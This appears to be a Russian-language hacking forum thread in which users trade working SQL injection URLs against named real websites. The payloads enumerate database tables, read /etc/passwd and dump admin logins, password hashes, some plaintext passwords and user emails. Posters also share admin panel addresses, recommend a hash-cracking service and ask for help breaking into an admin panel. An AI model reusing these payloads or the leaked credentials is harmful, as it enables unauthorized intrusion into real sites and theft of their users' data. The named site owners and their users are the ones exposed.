https://shop.invictusnetworks.com/detail.php?id=-16008+union+select+1,version(),3,4,5,6,7,8,9,0,1,2/* http://www.bigshoebazaar.com/showprod.php?prcd=2422+union+select+table_name+from+information_schema.tables/* есчё 2 шопа
Code: http://www.mebi.us/out.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e 2e2f6574632f706173737764/* PHp inj
Umaine.edu PR8 - вкусная Еда.) scott;graduate Hampshire.edu PR7 - Сладкая Еда, кому надо тот ест.) LUKAC, разкрутил..) едушки и еще
http://fevralka.ru/ http://fevralka.ru/index.php?p=gallerypic&img_id=-156+union+select+1,2,3,Column_name,5,6,7,8,9+from+information_schema.columns+where+table_name=char(107,111,111,98,105,52,95,117,115,101,114)+limit+16,1--&galid=8&area=1 http://fevralka.ru/index.php?p=gallerypic&img_id=-156+UNION+SELECT+1,2,3,TABLE_NAME+,5,6,7,8,9+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+79,1--&galid=8&area=1 http://fevralka.ru/index.php?p=gallerypic&img_id=-156+union+select+1,2,3,concat_ws(char(124),uname,pass),5,6,7,8,9+from+koobi4_user+limit+0,1--&galid=8&area=1 Fevralka|5d22b1855e0d9dd5eedf29d80fad4b04 361557736155773615577 Хом сайт симпотичной девушки )) Обратите внимание на пороль скорее всего домашний телефон (Это если девушка пригленнеться )))) Вот жмоты не кто даже бала не добавили (((
Code: http://www.the213.net/php/article.php?id=-796+uni on+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82/* скоко нашол))скулей а анти бойан прошла токо эта :'(
Сегодня у нас .nl PR - 7 Не стал крутить, так как всетки ПР хороший - кому надо, тот сам раскрутит PR - 6 Много хороших таблиц нашел - кому надо, опять таки же, раскопает. Много юзеров там ) Code: adminaccounts {id, email, password .... } user {user, password ... } 1:walther::7557c6b03f224601:gorilla Как видно - это админ. Админку не искал )) root@localhost:5.0.45:ti_database PR - 5 Разберетесь PR - 5 [email protected]:4.1.22-log:technepress PR - 5 1:jerry:a804942b62c5ad042450ce2c7a586f16:fl2sh - Админ. http://www.bispublishers.nl/admin/ - Админка. [email protected]:5.0.26-log:eholla_bis PR - 4 1:MichaelTiel:7778da162a13f837dd1c592d61ac6fed - Админ. audioarts@localhost:5.0.24a-Debian_9ubuntu2.4:audioarts Большое спасибо сервису - hashcracking.info Очень попрошу - без дефейсов.
www.inbiworld.com shop какой-то asia:kruta http://www.inbiworld.com/shop/ админы inbiadmin:bagua roman:inbi_au tom:taichi но админки не нашёл ( www.vmth.ucdavis.edu PhotoUa.Net - Фото Украины Ruslan:851bdb204959a3667778e19dba686c5d:[email protected] millionchik.ru Миллиончик
http://www.ndfeb.ru/news.php?act=news&num=-53+union+select+1,2,3,4,5,6,concat_ws(char(124),user,password)+from+user+limit+0,1/* http://www.ndfeb.ru/admin Admin|379f51227aa6aef0 tubgtn А теперь вопрос. как зайти в админку? Я думал имея логин и пас хватит что бы попасть аказалось не так кто сможет попасть скиньте. Уж больно интерестная админка.
Code: http://www.1class.aero/strana.php?id=-230+union+select+1,2,login,4,email,6,7,8,9,user(),11,12,13,14,15+from+1class_admin-- имя колонки с паролем не подобрал :-/ Pr=5, CMS=koobi Code: http://www.sequa.de/index.php?categ=-1+union+select+1,2,3/*&parent=0&p=downloads&area=1 Не смог подобрать имя таблицы, вот и выложил на паблик.(P.S. обычно kpro_user kpro6_user kpro5_user и т.д.)
.ro Времени нету почти, поэтому не все докрутил. Где блок стоит на вывод или на union сами разберетесь, кому надо ) Не везет что-то сегодня - все мускулы 4ые PR - 3 PR - 4 whieas@localhost:4.1.20-log:whieas PR - 4 finearts_ro@localhost:4.1.22-standard:finearts_ro PR - 4 narcis@localhost:4.1.22-standard-log:narcis_nv Code: [i][COLOR=SlateGray]1:narcis:12uiligriv21[/COLOR][/i] Админ. www.narcisvirgiliu.ro/admin/ - Админка. PR - 4 PR - 4 PR - 5 PR - 5 conusr@localhost:4.1.20ncdi2 Admin.pass - 556eba5e26cdd0e1 PR - 5 PR - 5 PRIMET@LOCALHOST:5.0.44RIMET Без дефейсов пожалуйста )
Вот смог развить инъекцию, налетай)) Code: http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,concat(name,%20char(58),name2,char(58),name3,char(58),passw,char(58),police,char(58),birthday,char(58),email,0x3C62723E)+FROM+author_tbl+limit+0,1000/* Мыла, логины, пароли, вся пачка. Вот имена таблиц: Code: http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,TABLE_NAME+FROM%20INFORMATION_SCHEMA.TABLES+limit+1,30/* Колонки в author_tbl Code: http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x617574686F725F74626C+limit+0,20/* PS Если что не так, не бейте сильно, я изучаю SQLINJ всего лишь четвертый день((
#urbaner нужно переходит к несуществующим значениям параметра http://www.kino.ru/cinema.php?id=-10+union+select+1,2,3,4,5,6,7/* http://www.kino.ru/cinema.php?id=99999999999999+union+select+1,2,3,4,5,6,7/* или так http://www.kino.ru/cinema.php?id=10+and+10=0+union+select+1,2,3,4,5,6,7/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT +1,2,3,4+FROM+INFORMATION_SCHEMA.columns/* [OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT +1,2,3,4+FROM+INFORMATION_SCHEMA.SCHEMATA/* [OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT +1,2,3,4+FROM+INFORMATION_SCHEMA.tables/* [OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT +1,2,3,4+FROM+mysql.user/* [OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT +1,2,3,4+FROM+dual/* [OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT +1,2,3,4+FROM+phpbb_users/*
